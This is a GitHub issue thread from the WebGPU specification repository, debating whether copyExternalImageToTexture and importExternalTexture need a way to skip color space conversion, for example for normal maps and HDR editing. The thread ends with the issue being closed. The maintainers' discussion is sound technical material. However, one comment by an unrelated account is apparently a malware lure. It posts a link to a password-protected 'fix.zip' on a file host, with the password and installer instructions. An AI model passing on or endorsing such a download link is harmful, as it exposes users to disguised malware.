### ISSUE TITLE
copyExternalImageToTexture/importExternalTexture: Need a way to opt-out of color space conversion

### ISSUE THREAD

**Issue by ccameron-chromium** [gpuweb/gpuweb#4826]
The only way to opt-out of color space conversion in copyExternalImageToTexture/importExternalTexture is to:
* Use `createImageBitmap` and specify `colorSpaceConversion:"none"`
  * Note that this only applies to images as the spec is currently written, but that should be updated in [this issue](https://github.com/whatwg/html/issues/10578)
* Set the `colorSpace` parameter to [`GPUImageCopyTextureTagged`](https://www.w3.org/TR/webgpu/#gpuimagecopytexturetagged) or [`GPUExternalTextureDescriptor`](https://www.w3.org/TR/webgpu/#dictdef-gpuexternaltexturedescriptor) to `"srgb"
* Rely on implicit treatment of images that have no color profile metadata as being sRGB (see [here in canvas](https://html.spec.whatwg.org/multipage/canvas.html#colour-spaces-and-colour-correction) and [here in CSS color](https://drafts.csswg.org/css-color/#untagged)) to ensure that no color conversion is applied

This is a bit roundabout, and it also requires going through `createImageBitmap`, and therefore requires extra copies of the texture data being performed (it can't be used when importing video data directly via `importExternalTexture`).

Probably the simplest fix for this would be to replace the `PredefinedColorSpace` usage in `GPUImageCopyTextureTagged` and `GPUExternalTextureDescriptor` with something that allows specifying `"none"` or `null`, or something to that effect (the exact details of how IDL unions of enums work may need some examining).

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kainino0x** [comment]
In the initial design I avoided having any way of doing this, because I feel it breaks out of the abstractions of managed color - now rather than having images comprised of pixels with colors, we need to know something about the raw representation of the source image. If we do need to add this I'd like to somehow phrase it as "reach into the source image to get its raw representation [what does this mean?] and reinterpret that as sRGB"

It would also be helpful for me to understand better what this is needed for.

I wonder if we can possibly make this ability the responsibility of WebCodecs - like, take an image, and use webcodecs to [decode](https://www.w3.org/TR/webcodecs/#image-decoding) it into a "VideoFrame" which has the desired properties?

**Comment by kainino0x** [comment]
> I wonder if we can possibly make this ability the responsibility of WebCodecs - like, take an image, and use webcodecs to [decode](https://www.w3.org/TR/webcodecs/#image-decoding) it into a "VideoFrame" which has the desired properties?

To clarify - if that doesn't look practical, then I am fine with adding something to our color space enum. Just want to think of the right words to use to describe it. For example:

```diff
 dictionary GPUImageCopyExternalImage {
     required GPUImageCopyExternalImageSource source;
     GPUOrigin2D origin = {};
     boolean flipY = false;
+    /*optional*/ PredefinedColorSpace reinterpretDataAsColorSpace;
 };
```

If reinterpreting is invalid for any types of source (e.g. things that are YUV underneath?) we can disallow it in validation.

**Comment by greggman** [comment]
> It would also be helpful for me to understand better what this is needed for.

Loading normal maps, gloss maps, reflection maps, height maps, and any other kind of texture stored in a PNG/JPG that is not really made of colors?

Is that what you meant by needed for?

**Comment by shaoboyan** [comment]
>Loading normal maps, gloss maps, reflection maps, height maps, and any other kind of texture stored in a PNG/JPG that is not really made of colors?

WebGL provides `NONE` for `gl.UNPACK_COLORSPACE_CONVERSION_WEBGL` so maybe we should add a `none` value for `PredefinedColorSpace ` or similar. 

One question:
IIUC, PNG/JPG has color space, if store  normal mpas etc into PNG/JPG, is it keeps empty or something else?

**Comment by kainino0x** [comment]
> Loading normal maps, gloss maps, reflection maps, height maps, and any other kind of texture stored in a PNG/JPG that is not really made of colors?
> 
> Is that what you meant by needed for?

I would think those types of images are typically stored without a color profile, though it's likely there are non-color assets out there which have color profiles that they rely on being ignored. IIUC the web platform generally defaults to sRGB in this case. So if you upload those with WebGPU's defaults you get sRGB->sRGB, no conversion.

What I'm wondering is, when would you have an image that you have some knowledge of the underlying representation of, that _has_ a color profile that you wish to ignore? Though that probably answers my own question - a photo editing app could very possibly want to keep the data in its original encoding and extract the color profile separately. I'm still uncertain what "original encoding" would mean though, especially if the original image is a video frame (or YUV AVIF file, etc.)

I know that WebGL _has_ a behavior here, but that behavior seems quite difficult to define well. If possible I'd prefer a design that has clearer behavior so that browsers will stumble into the correct behavior, instead of having to have dozens of test cases for what conversions happen in which cases (and are inevitably undertested).

**Comment by greggman** [comment]
I don't know what WebGL does today. I know when I wrote the tests originally, at least for PNG, the test was that you get raw byte values and color space info is ignored. So, expand the data to 8bits per channel (for example if it's a 4bit png or a indexed png). Then, provide that data, ignoring any color-space. There were tests that would specifically put a color space in there that would provide the wrong color if the color-space was not ignored.

It gets more complicated for .JPG which doesn't have "raw" values. I don't remember if there were tests for that at the time (apply a color-space that converts red (1,0,0) to green (0,1,0) and make sure you still get something close to red.

All that said, I'm clueless about color space issues in general. I just knew it was common to load both PNG and JPG as normal maps (super common) and also as other types of maps (gloss, reflection, height, ...) where I assumed, applying color space would corrupt the data.

My assumption at the time was that the browser defaulted to converting the image from whatever color space the image was in, to whatever color space the browser needed to render most efficiently on the current device. Effectively, `UNPACK_COLORSPACE_CONVERSION_WEBGL` was supposed to ignore both steps. 

1. Make sure not to apply the color space from the image
2. Make sure the browser doesn't use an image it has already loaded and applied a color space to

**Comment by ccameron-chromium** [comment]
> My assumption at the time was that the browser defaulted to converting the image from whatever color space the image was in, to whatever color space the browser needed to render most efficiently on the current device. Effectively, `UNPACK_COLORSPACE_CONVERSION_WEBGL` was supposed to ignore both steps.

Thanks, that jogs my memory now.

At some point (~2014 I think), Chrome had the behavior that:
* Images that have color profiles are *converted* to the device's color space
* Images that did not have color spaces are *reinterpreted as being* in the device's color space

This sort of behavior is terrible, and should have never been shipped. But that's what was shipping when I got into the area.

> I would think those types of images are typically stored without a color profile, though it's likely there are non-color assets out there which have color profiles that they rely on being ignored (or which happen to be close to sRGB). IIUC the web platform generally defaults to sRGB in this case. So if you upload those with WebGPU's defaults you get sRGB->sRGB, no conversion.

My guess is that normal map images would often get an sRGB color profile attached. This is a totally normal thing, and should cause no problems. BUT, back in 2014, this meant that you'd do an sRGB->(whatever the color space of the device is) conversion, which would totally ruin your normal maps.

I suspect that `UNPACK_COLORSPACE_CONVERSION_WEBGL` was added to work around this buggy behavior.

> What I'm wondering is, when would you have an image that you have some knowledge of the underlying representation of, that has a color profile that you wish to ignore?

If that's the case, then maybe we don't need this after all. I'm wanting to use it for editing HDR image and video content, but there are potentially other solutions to that problem.

> I'm still uncertain what "original encoding" would mean though, especially if the original image is a video frame (or YUV AVIF file, etc.)

> I know that WebGL has a behavior here, but that behavior seems quite difficult to define well. If possible I'd prefer a design that has clearer behavior so that browsers will stumble into the correct behavior, instead of having to have dozens of test cases for what conversions happen in which cases (and are inevitably undertested).

You're right that this is fairly subtle. Original encoding here means "converted to RGB". For JPEG this means applying a well-defined matrix. For all other YUV formats, those formats come with a [CICP](https://en.wikipedia.org/wiki/Coding-independent_code_points) tag. In that case "converted to RGB" means "re-formulated as having the matrix be RGB and the range be FULL".

But unless we write this down very explicitly, and write the tests for this, it's all fairly pointless.

**Comment by ccameron-chromium** [comment]
> If that's the case, then maybe we don't need this after all. I'm wanting to use it for editing HDR image and video content, but there are potentially other solutions to that problem.

Indeed, I don't think this is the right solution for HDR image and video content.

I've filed an issue for the more appropriate scheme in https://github.com/gpuweb/gpuweb/issues/5236.

Closing this.
